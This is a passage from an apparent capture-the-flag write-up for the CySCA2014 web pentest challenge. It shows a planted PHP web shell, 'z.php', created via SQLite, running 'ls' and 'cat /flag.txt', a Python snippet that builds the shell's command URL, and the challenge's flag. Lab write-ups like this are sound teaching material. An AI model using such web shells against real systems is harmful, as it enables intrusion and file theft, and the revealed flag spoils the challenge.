As shown above, accessing ‘z.php’ and feeding it the ‘ls’ command returns the contents of the working directory. The SQLite information at the start of the output is there because SQLite created ‘z.php’ as a database file, so it carries additional database metadata. It doesn’t interfere with our commands though, and feeding it the system command ‘cat /flag.txt’ returns the final flag for the web application pentest section of CySCA2014: “TryingCrampFibrous963”.
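For completeness, the final step amounts to requesting a URL like the one built below. The host is a placeholder for the challenge VM; this sketch only constructs the URL and does not contact anything:

```python
from urllib.parse import quote

host = "http://192.168.1.64"   # placeholder address for the challenge VM
cmd = "cat /flag.txt"
url = "%s/z.php?cmd=%s" % (host, quote(cmd))
print(url)
# Fetching this URL (e.g. with urllib.request.urlopen) would return the
# SQLite file header followed by the output of the command, i.e. the flag.
```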